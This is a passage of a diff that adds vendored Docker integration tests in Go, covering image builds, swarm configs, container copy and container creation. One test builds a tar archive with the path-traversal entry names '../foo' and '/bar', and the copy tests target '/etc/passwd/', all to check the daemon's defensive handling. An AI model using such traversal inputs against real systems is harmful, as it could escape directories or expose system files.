+	assert.Check(t, is.Contains(image.Config.Env, "WHO=parent"))
+}
+
+// Test cases in #36996
+func TestBuildLabelWithTargets(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.38"), "test added after 1.38")
+	bldName := "build-a"
+	testLabels := map[string]string{
+		"foo":  "bar",
+		"dead": "beef",
+	}
+
+	dockerfile := `
+		FROM busybox AS target-a
+		CMD ["/dev"]
+		LABEL label-a=inline-a
+		FROM busybox AS target-b
+		CMD ["/dist"]
+		LABEL label-b=inline-b
+		`
+
+	ctx := context.Background()
+	source := fakecontext.New(t, "", fakecontext.WithDockerfile(dockerfile))
+	defer source.Close()
+
+	apiclient := testEnv.APIClient()
+	// For `target-a` build
+	resp, err := apiclient.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+			Tags:        []string{bldName},
+			Labels:      testLabels,
+			Target:      "target-a",
+		})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	image, _, err := apiclient.ImageInspectWithRaw(ctx, bldName)
+	assert.NilError(t, err)
+
+	testLabels["label-a"] = "inline-a"
+	for k, v := range testLabels {
+		x, ok := image.Config.Labels[k]
+		assert.Assert(t, ok)
+		assert.Assert(t, x == v)
+	}
+
+	// For `target-b` build
+	bldName = "build-b"
+	delete(testLabels, "label-a")
+	resp, err = apiclient.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+			Tags:        []string{bldName},
+			Labels:      testLabels,
+			Target:      "target-b",
+		})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	image, _, err = apiclient.ImageInspectWithRaw(ctx, bldName)
+	assert.NilError(t, err)
+
+	testLabels["label-b"] = "inline-b"
+	for k, v := range testLabels {
+		x, ok := image.Config.Labels[k]
+		assert.Assert(t, ok)
+		assert.Assert(t, x == v)
+	}
+}
+
+func TestBuildWithEmptyLayers(t *testing.T) {
+	dockerfile := `
+		FROM    busybox
+		COPY    1/ /target/
+		COPY    2/ /target/
+		COPY    3/ /target/
+	`
+	ctx := context.Background()
+	source := fakecontext.New(t, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFile("1/a", "asdf"),
+		fakecontext.WithFile("2/a", "asdf"),
+		fakecontext.WithFile("3/a", "asdf"))
+	defer source.Close()
+
+	apiclient := testEnv.APIClient()
+	resp, err := apiclient.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+		})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+}
+
+// TestBuildMultiStageOnBuild checks that ONBUILD commands are applied to
+// multiple subsequent stages
+// #35652
+func TestBuildMultiStageOnBuild(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.33"), "broken in earlier versions")
+	defer setupTest(t)()
+	// test both metadata and layer based commands as they may be implemented differently
+	dockerfile := `FROM busybox AS stage1
+ONBUILD RUN echo 'foo' >somefile
+ONBUILD ENV bar=baz
+
+FROM stage1
+RUN cat somefile # fails if ONBUILD RUN fails
+
+FROM stage1
+RUN cat somefile`
+
+	ctx := context.Background()
+	source := fakecontext.New(t, "",
+		fakecontext.WithDockerfile(dockerfile))
+	defer source.Close()
+
+	apiclient := testEnv.APIClient()
+	resp, err := apiclient.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+		})
+
+	out := bytes.NewBuffer(nil)
+	assert.NilError(t, err)
+	_, err = io.Copy(out, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Contains(out.String(), "Successfully built"))
+
+	imageIDs, err := getImageIDsFromBuild(out.Bytes())
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(3, len(imageIDs)))
+
+	image, _, err := apiclient.ImageInspectWithRaw(context.Background(), imageIDs[2])
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(image.Config.Env, "bar=baz"))
+}
+
+// #35403 #36122
+func TestBuildUncleanTarFilenames(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.37"), "broken in earlier versions")
+	ctx := context.TODO()
+	defer setupTest(t)()
+
+	dockerfile := `FROM scratch
+COPY foo /
+FROM scratch
+COPY bar /`
+
+	buf := bytes.NewBuffer(nil)
+	w := tar.NewWriter(buf)
+	writeTarRecord(t, w, "Dockerfile", dockerfile)
+	writeTarRecord(t, w, "../foo", "foocontents0")
+	writeTarRecord(t, w, "/bar", "barcontents0")
+	err := w.Close()
+	assert.NilError(t, err)
+
+	apiclient := testEnv.APIClient()
+	resp, err := apiclient.ImageBuild(ctx,
+		buf,
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+		})
+
+	out := bytes.NewBuffer(nil)
+	assert.NilError(t, err)
+	_, err = io.Copy(out, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	// repeat with changed data should not cause cache hits
+
+	buf = bytes.NewBuffer(nil)
+	w = tar.NewWriter(buf)
+	writeTarRecord(t, w, "Dockerfile", dockerfile)
+	writeTarRecord(t, w, "../foo", "foocontents1")
+	writeTarRecord(t, w, "/bar", "barcontents1")
+	err = w.Close()
+	assert.NilError(t, err)
+
+	resp, err = apiclient.ImageBuild(ctx,
+		buf,
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+		})
+
+	out = bytes.NewBuffer(nil)
+	assert.NilError(t, err)
+	_, err = io.Copy(out, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+	assert.Assert(t, !strings.Contains(out.String(), "Using cache"))
+}
+
+// docker/for-linux#135
+// #35641
+func TestBuildMultiStageLayerLeak(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.37"), "broken in earlier versions")
+	ctx := context.TODO()
+	defer setupTest(t)()
+
+	// all commands need to match until COPY
+	dockerfile := `FROM busybox
+WORKDIR /foo
+COPY foo .
+FROM busybox
+WORKDIR /foo
+COPY bar .
+RUN [ -f bar ]
+RUN [ ! -f foo ]
+`
+
+	source := fakecontext.New(t, "",
+		fakecontext.WithFile("foo", "0"),
+		fakecontext.WithFile("bar", "1"),
+		fakecontext.WithDockerfile(dockerfile))
+	defer source.Close()
+
+	apiclient := testEnv.APIClient()
+	resp, err := apiclient.ImageBuild(ctx,
+		source.AsTarReader(t),
+		types.ImageBuildOptions{
+			Remove:      true,
+			ForceRemove: true,
+		})
+
+	out := bytes.NewBuffer(nil)
+	assert.NilError(t, err)
+	_, err = io.Copy(out, resp.Body)
+	resp.Body.Close()
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Contains(out.String(), "Successfully built"))
+}
+
+func writeTarRecord(t *testing.T, w *tar.Writer, fn, contents string) {
+	err := w.WriteHeader(&tar.Header{
+		Name:     fn,
+		Mode:     0600,
+		Size:     int64(len(contents)),
+		Typeflag: '0',
+	})
+	assert.NilError(t, err)
+	_, err = w.Write([]byte(contents))
+	assert.NilError(t, err)
+}
+
+type buildLine struct {
+	Stream string
+	Aux    struct {
+		ID string
+	}
+}
+
+func getImageIDsFromBuild(output []byte) ([]string, error) {
+	var ids []string
+	for _, line := range bytes.Split(output, []byte("\n")) {
+		if len(line) == 0 {
+			continue
+		}
+		entry := buildLine{}
+		if err := json.Unmarshal(line, &entry); err != nil {
+			return nil, err
+		}
+		if entry.Aux.ID != "" {
+			ids = append(ids, entry.Aux.ID)
+		}
+	}
+	return ids, nil
+}
diff --git a/vendor/github.com/docker/docker/integration/build/main_test.go b/vendor/github.com/docker/docker/integration/build/main_test.go
new file mode 100644
index 0000000000..fef3909fd5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/build/main_test.go
@@ -0,0 +1,33 @@
+package build // import "github.com/docker/docker/integration/build"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/config/config_test.go b/vendor/github.com/docker/docker/integration/config/config_test.go
new file mode 100644
index 0000000000..3cbca23899
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/config/config_test.go
@@ -0,0 +1,356 @@
+package config // import "github.com/docker/docker/integration/config"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"sort"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/swarm"
+	"github.com/docker/docker/pkg/stdcopy"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestConfigList(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+
+	// This test case is ported from the original TestConfigsEmptyList
+	configs, err := client.ConfigList(ctx, types.ConfigListOptions{})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(len(configs), 0))
+
+	testName0 := "test0-" + t.Name()
+	testName1 := "test1-" + t.Name()
+	testNames := []string{testName0, testName1}
+	sort.Strings(testNames)
+
+	// create config test0
+	createConfig(ctx, t, client, testName0, []byte("TESTINGDATA0"), map[string]string{"type": "test"})
+
+	config1ID := createConfig(ctx, t, client, testName1, []byte("TESTINGDATA1"), map[string]string{"type": "production"})
+
+	names := func(entries []swarmtypes.Config) []string {
+		var values []string
+		for _, entry := range entries {
+			values = append(values, entry.Spec.Name)
+		}
+		sort.Strings(values)
+		return values
+	}
+
+	// test by `config ls`
+	entries, err := client.ConfigList(ctx, types.ConfigListOptions{})
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(names(entries), testNames))
+
+	testCases := []struct {
+		filters  filters.Args
+		expected []string
+	}{
+		// test filter by name `config ls --filter name=xxx`
+		{
+			filters:  filters.NewArgs(filters.Arg("name", testName0)),
+			expected: []string{testName0},
+		},
+		// test filter by id `config ls --filter id=xxx`
+		{
+			filters:  filters.NewArgs(filters.Arg("id", config1ID)),
+			expected: []string{testName1},
+		},
+		// test filter by label `config ls --filter label=xxx`
+		{
+			filters:  filters.NewArgs(filters.Arg("label", "type")),
+			expected: testNames,
+		},
+		{
+			filters:  filters.NewArgs(filters.Arg("label", "type=test")),
+			expected: []string{testName0},
+		},
+		{
+			filters:  filters.NewArgs(filters.Arg("label", "type=production")),
+			expected: []string{testName1},
+		},
+	}
+	for _, tc := range testCases {
+		entries, err = client.ConfigList(ctx, types.ConfigListOptions{
+			Filters: tc.filters,
+		})
+		assert.NilError(t, err)
+		assert.Check(t, is.DeepEqual(names(entries), tc.expected))
+
+	}
+}
+
+func createConfig(ctx context.Context, t *testing.T, client client.APIClient, name string, data []byte, labels map[string]string) string {
+	config, err := client.ConfigCreate(ctx, swarmtypes.ConfigSpec{
+		Annotations: swarmtypes.Annotations{
+			Name:   name,
+			Labels: labels,
+		},
+		Data: data,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, config.ID != "")
+	return config.ID
+}
+
+func TestConfigsCreateAndDelete(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+
+	testName := "test_config-" + t.Name()
+
+	// This test case is ported from the original TestConfigsCreate
+	configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil)
+
+	insp, _, err := client.ConfigInspectWithRaw(ctx, configID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Name, testName))
+
+	// This test case is ported from the original TestConfigsDelete
+	err = client.ConfigRemove(ctx, configID)
+	assert.NilError(t, err)
+
+	insp, _, err = client.ConfigInspectWithRaw(ctx, configID)
+	assert.Check(t, is.ErrorContains(err, "No such config"))
+}
+
+func TestConfigsUpdate(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+
+	testName := "test_config-" + t.Name()
+
+	// This test case is ported from the original TestConfigsCreate
+	configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil)
+
+	insp, _, err := client.ConfigInspectWithRaw(ctx, configID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.ID, configID))
+
+	// test UpdateConfig with full ID
+	insp.Spec.Labels = map[string]string{"test": "test1"}
+	err = client.ConfigUpdate(ctx, configID, insp.Version, insp.Spec)
+	assert.NilError(t, err)
+
+	insp, _, err = client.ConfigInspectWithRaw(ctx, configID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test1"))
+
+	// test UpdateConfig with full name
+	insp.Spec.Labels = map[string]string{"test": "test2"}
+	err = client.ConfigUpdate(ctx, testName, insp.Version, insp.Spec)
+	assert.NilError(t, err)
+
+	insp, _, err = client.ConfigInspectWithRaw(ctx, configID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test2"))
+
+	// test UpdateConfig with prefix ID
+	insp.Spec.Labels = map[string]string{"test": "test3"}
+	err = client.ConfigUpdate(ctx, configID[:1], insp.Version, insp.Spec)
+	assert.NilError(t, err)
+
+	insp, _, err = client.ConfigInspectWithRaw(ctx, configID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Labels["test"], "test3"))
+
+	// test UpdateConfig in updating Data which is not supported in daemon
+	// this test will produce an error in func UpdateConfig
+	insp.Spec.Data = []byte("TESTINGDATA2")
+	err = client.ConfigUpdate(ctx, configID, insp.Version, insp.Spec)
+	assert.Check(t, is.ErrorContains(err, "only updates to Labels are allowed"))
+}
+
+func TestTemplatedConfig(t *testing.T) {
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+	ctx := context.Background()
+
+	referencedSecretName := "referencedsecret-" + t.Name()
+	referencedSecretSpec := swarmtypes.SecretSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: referencedSecretName,
+		},
+		Data: []byte("this is a secret"),
+	}
+	referencedSecret, err := client.SecretCreate(ctx, referencedSecretSpec)
+	assert.Check(t, err)
+
+	referencedConfigName := "referencedconfig-" + t.Name()
+	referencedConfigSpec := swarmtypes.ConfigSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: referencedConfigName,
+		},
+		Data: []byte("this is a config"),
+	}
+	referencedConfig, err := client.ConfigCreate(ctx, referencedConfigSpec)
+	assert.Check(t, err)
+
+	templatedConfigName := "templated_config-" + t.Name()
+	configSpec := swarmtypes.ConfigSpec{
+		Annotations: swarmtypes.Annotations{
+			Name: templatedConfigName,
+		},
+		Templating: &swarmtypes.Driver{
+			Name: "golang",
+		},
+		Data: []byte("SERVICE_NAME={{.Service.Name}}\n" +
+			"{{secret \"referencedsecrettarget\"}}\n" +
+			"{{config \"referencedconfigtarget\"}}\n"),
+	}
+
+	templatedConfig, err := client.ConfigCreate(ctx, configSpec)
+	assert.Check(t, err)
+
+	serviceID := swarm.CreateService(t, d,
+		swarm.ServiceWithConfig(
+			&swarmtypes.ConfigReference{
+				File: &swarmtypes.ConfigReferenceFileTarget{
+					Name: "/" + templatedConfigName,
+					UID:  "0",
+					GID:  "0",
+					Mode: 0600,
+				},
+				ConfigID:   templatedConfig.ID,
+				ConfigName: templatedConfigName,
+			},
+		),
+		swarm.ServiceWithConfig(
+			&swarmtypes.ConfigReference{
+				File: &swarmtypes.ConfigReferenceFileTarget{
+					Name: "referencedconfigtarget",
+					UID:  "0",
+					GID:  "0",
+					Mode: 0600,
+				},
+				ConfigID:   referencedConfig.ID,
+				ConfigName: referencedConfigName,
+			},
+		),
+		swarm.ServiceWithSecret(
+			&swarmtypes.SecretReference{
+				File: &swarmtypes.SecretReferenceFileTarget{
+					Name: "referencedsecrettarget",
+					UID:  "0",
+					GID:  "0",
+					Mode: 0600,
+				},
+				SecretID:   referencedSecret.ID,
+				SecretName: referencedSecretName,
+			},
+		),
+		swarm.ServiceWithName("svc"),
+	)
+
+	var tasks []swarmtypes.Task
+	waitAndAssert(t, 60*time.Second, func(t *testing.T) bool {
+		tasks = swarm.GetRunningTasks(t, d, serviceID)
+		return len(tasks) > 0
+	})
+
+	task := tasks[0]
+	waitAndAssert(t, 60*time.Second, func(t *testing.T) bool {
+		if task.NodeID == "" || (task.Status.ContainerStatus == nil || task.Status.ContainerStatus.ContainerID == "") {
+			task, _, _ = client.TaskInspectWithRaw(context.Background(), task.ID)
+		}
+		return task.NodeID != "" && task.Status.ContainerStatus != nil && task.Status.ContainerStatus.ContainerID != ""
+	})
+
+	attach := swarm.ExecTask(t, d, task, types.ExecConfig{
+		Cmd:          []string{"/bin/cat", "/" + templatedConfigName},
+		AttachStdout: true,
+		AttachStderr: true,
+	})
+
+	expect := "SERVICE_NAME=svc\n" +
+		"this is a secret\n" +
+		"this is a config\n"
+	assertAttachedStream(t, attach, expect)
+
+	attach = swarm.ExecTask(t, d, task, types.ExecConfig{
+		Cmd:          []string{"mount"},
+		AttachStdout: true,
+		AttachStderr: true,
+	})
+	assertAttachedStream(t, attach, "tmpfs on /"+templatedConfigName+" type tmpfs")
+}
+
+func assertAttachedStream(t *testing.T, attach types.HijackedResponse, expect string) {
+	buf := bytes.NewBuffer(nil)
+	_, err := stdcopy.StdCopy(buf, buf, attach.Reader)
+	assert.NilError(t, err)
+	assert.Check(t, is.Contains(buf.String(), expect))
+}
+
+func waitAndAssert(t *testing.T, timeout time.Duration, f func(*testing.T) bool) {
+	t.Helper()
+	after := time.After(timeout)
+	for {
+		select {
+		case <-after:
+			t.Fatalf("timed out waiting for condition")
+		default:
+		}
+		if f(t) {
+			return
+		}
+		time.Sleep(100 * time.Millisecond)
+	}
+}
+
+func TestConfigInspect(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	d := swarm.NewSwarm(t, testEnv)
+	defer d.Stop(t)
+	client := d.NewClientT(t)
+	defer client.Close()
+
+	ctx := context.Background()
+
+	testName := t.Name()
+	configID := createConfig(ctx, t, client, testName, []byte("TESTINGDATA"), nil)
+
+	insp, body, err := client.ConfigInspectWithRaw(ctx, configID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(insp.Spec.Name, testName))
+
+	var config swarmtypes.Config
+	err = json.Unmarshal(body, &config)
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual(config, insp))
+}
diff --git a/vendor/github.com/docker/docker/integration/config/main_test.go b/vendor/github.com/docker/docker/integration/config/main_test.go
new file mode 100644
index 0000000000..3c8f0483f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/config/main_test.go
@@ -0,0 +1,33 @@
+package config // import "github.com/docker/docker/integration/config"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/container/copy_test.go b/vendor/github.com/docker/docker/integration/container/copy_test.go
new file mode 100644
index 0000000000..241b719eb7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/copy_test.go
@@ -0,0 +1,65 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"fmt"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestCopyFromContainerPathDoesNotExist(t *testing.T) {
+	defer setupTest(t)()
+
+	ctx := context.Background()
+	apiclient := testEnv.APIClient()
+	cid := container.Create(t, ctx, apiclient)
+
+	_, _, err := apiclient.CopyFromContainer(ctx, cid, "/dne")
+	assert.Check(t, client.IsErrNotFound(err))
+	expected := fmt.Sprintf("No such container:path: %s:%s", cid, "/dne")
+	assert.Check(t, is.ErrorContains(err, expected))
+}
+
+func TestCopyFromContainerPathIsNotDir(t *testing.T) {
+	defer setupTest(t)()
+	skip.If(t, testEnv.OSType == "windows")
+
+	ctx := context.Background()
+	apiclient := testEnv.APIClient()
+	cid := container.Create(t, ctx, apiclient)
+
+	_, _, err := apiclient.CopyFromContainer(ctx, cid, "/etc/passwd/")
+	assert.Assert(t, is.ErrorContains(err, "not a directory"))
+}
+
+func TestCopyToContainerPathDoesNotExist(t *testing.T) {
+	defer setupTest(t)()
+	skip.If(t, testEnv.OSType == "windows")
+
+	ctx := context.Background()
+	apiclient := testEnv.APIClient()
+	cid := container.Create(t, ctx, apiclient)
+
+	err := apiclient.CopyToContainer(ctx, cid, "/dne", nil, types.CopyToContainerOptions{})
+	assert.Check(t, client.IsErrNotFound(err))
+	expected := fmt.Sprintf("No such container:path: %s:%s", cid, "/dne")
+	assert.Check(t, is.ErrorContains(err, expected))
+}
+
+func TestCopyToContainerPathIsNotDir(t *testing.T) {
+	defer setupTest(t)()
+	skip.If(t, testEnv.OSType == "windows")
+
+	ctx := context.Background()
+	apiclient := testEnv.APIClient()
+	cid := container.Create(t, ctx, apiclient)
+
+	err := apiclient.CopyToContainer(ctx, cid, "/etc/passwd/", nil, types.CopyToContainerOptions{})
+	assert.Assert(t, is.ErrorContains(err, "not a directory"))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/create_test.go b/vendor/github.com/docker/docker/integration/container/create_test.go
new file mode 100644
index 0000000000..f94eb4a3fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/create_test.go
@@ -0,0 +1,303 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strconv"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/network"
+	ctr "github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/oci"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestCreateFailsWhenIdentifierDoesNotExist(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+
+	testCases := []struct {
+		doc           string
+		image         string
+		expectedError string
+	}{
+		{
+			doc:           "image and tag",
+			image:         "test456:v1",
+			expectedError: "No such image: test456:v1",
+		},
+		{
+			doc:           "image no tag",
+			image:         "test456",
+			expectedError: "No such image: test456",
+		},
+		{
+			doc:           "digest",
+			image:         "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa",
+			expectedError: "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa",
+		},
+	}
+
+	for _, tc := range testCases {
+		tc := tc
+		t.Run(tc.doc, func(t *testing.T) {
+			t.Parallel()
+			_, err := client.ContainerCreate(context.Background(),
+				&container.Config{Image: tc.image},
+				&container.HostConfig{},
+				&network.NetworkingConfig{},
+				"",
+			)
+			assert.Check(t, is.ErrorContains(err, tc.expectedError))
+		})
+	}
+}
+
+func TestCreateWithInvalidEnv(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+
+	testCases := []struct {
+		env           string
+		expectedError string
+	}{
+		{
+			env:           "",
+			expectedError: "invalid environment variable:",
+		},
+		{
+			env:           "=",
+			expectedError: "invalid environment variable: =",
+		},
+		{
+			env:           "=foo",
+			expectedError: "invalid environment variable: =foo",
+		},
+	}
+
+	for index, tc := range testCases {
+		tc := tc
+		t.Run(strconv.Itoa(index), func(t *testing.T) {
+			t.Parallel()
+			_, err := client.ContainerCreate(context.Background(),
+				&container.Config{
+					Image: "busybox",
+					Env:   []string{tc.env},
+				},
+				&container.HostConfig{},
+				&network.NetworkingConfig{},
+				"",
+			)
+			assert.Check(t, is.ErrorContains(err, tc.expectedError))
+		})
+	}
+}
+
+// Test case for #30166 (target was not validated)
+func TestCreateTmpfsMountsTarget(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+
+	testCases := []struct {
+		target        string
+		expectedError string
+	}{
+		{
+			target:        ".",
+			expectedError: "mount path must be absolute",
+		},
+		{
+			target:        "foo",
+			expectedError: "mount path must be absolute",
+		},
+		{
+			target:        "/",
+			expectedError: "destination can't be '/'",
+		},
+		{
+			target:        "//",
+			expectedError: "destination can't be '/'",
+		},
+	}
+
+	for _, tc := range testCases {
+		_, err := client.ContainerCreate(context.Background(),
+			&container.Config{
+				Image: "busybox",
+			},
+			&container.HostConfig{
+				Tmpfs: map[string]string{tc.target: ""},
+			},
+			&network.NetworkingConfig{},
+			"",
+		)
+		assert.Check(t, is.ErrorContains(err, tc.expectedError))
+	}
+}
+func TestCreateWithCustomMaskedPaths(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	testCases := []struct {
+		maskedPaths []string
+		expected    []string
+	}{
+		{
+			maskedPaths: []string{},
+			expected:    []string{},
+		},
+		{
+			maskedPaths: nil,
+			expected:    oci.DefaultSpec().Linux.MaskedPaths,
+		},
+		{
+			maskedPaths: []string{"/proc/kcore", "/proc/keys"},
+			expected:    []string{"/proc/kcore", "/proc/keys"},
+		},
+	}
+
+	checkInspect := func(t *testing.T, ctx context.Context, name string, expected []string) {
+		_, b, err := client.ContainerInspectWithRaw(ctx, name, false)
+		assert.NilError(t, err)
+
+		var inspectJSON map[string]interface{}
+		err = json.Unmarshal(b, &inspectJSON)
+		assert.NilError(t, err)
+
+		cfg, ok := inspectJSON["HostConfig"].(map[string]interface{})
+		assert.Check(t, is.Equal(true, ok), name)
+
+		maskedPaths, ok := cfg["MaskedPaths"].([]interface{})
+		assert.Check(t, is.Equal(true, ok), name)
+
+		mps := []string{}
+		for _, mp := range maskedPaths {
+			mps = append(mps, mp.(string))
+		}
+
+		assert.DeepEqual(t, expected, mps)
+	}
+
+	for i, tc := range testCases {
+		name := fmt.Sprintf("create-masked-paths-%d", i)
+		config := container.Config{
+			Image: "busybox",
+			Cmd:   []string{"true"},
+		}
+		hc := container.HostConfig{}
+		if tc.maskedPaths != nil {
+			hc.MaskedPaths = tc.maskedPaths
+		}
+
+		// Create the container.
+		c, err := client.ContainerCreate(context.Background(),
+			&config,
+			&hc,
+			&network.NetworkingConfig{},
+			name,
+		)
+		assert.NilError(t, err)
+
+		checkInspect(t, ctx, name, tc.expected)
+
+		// Start the container.
+		err = client.ContainerStart(ctx, c.ID, types.ContainerStartOptions{})
+		assert.NilError(t, err)
+
+		poll.WaitOn(t, ctr.IsInState(ctx, client, c.ID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+		checkInspect(t, ctx, name, tc.expected)
+	}
+}
+
+func TestCreateWithCustomReadonlyPaths(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	testCases := []struct {
+		doc           string
+		readonlyPaths []string
+		expected      []string
+	}{
+		{
+			readonlyPaths: []string{},
+			expected:      []string{},
+		},
+		{
+			readonlyPaths: nil,
+			expected:      oci.DefaultSpec().Linux.ReadonlyPaths,
+		},
+		{
+			readonlyPaths: []string{"/proc/asound", "/proc/bus"},
+			expected:      []string{"/proc/asound", "/proc/bus"},
+		},
+	}
+
+	checkInspect := func(t *testing.T, ctx context.Context, name string, expected []string) {
+		_, b, err := client.ContainerInspectWithRaw(ctx, name, false)
+		assert.NilError(t, err)
+
+		var inspectJSON map[string]interface{}
+		err = json.Unmarshal(b, &inspectJSON)
+		assert.NilError(t, err)
+
+		cfg, ok := inspectJSON["HostConfig"].(map[string]interface{})
+		assert.Check(t, is.Equal(true, ok), name)
+
+		readonlyPaths, ok := cfg["ReadonlyPaths"].([]interface{})
+		assert.Check(t, is.Equal(true, ok), name)
+
+		rops := []string{}
+		for _, rop := range readonlyPaths {
+			rops = append(rops, rop.(string))
+		}
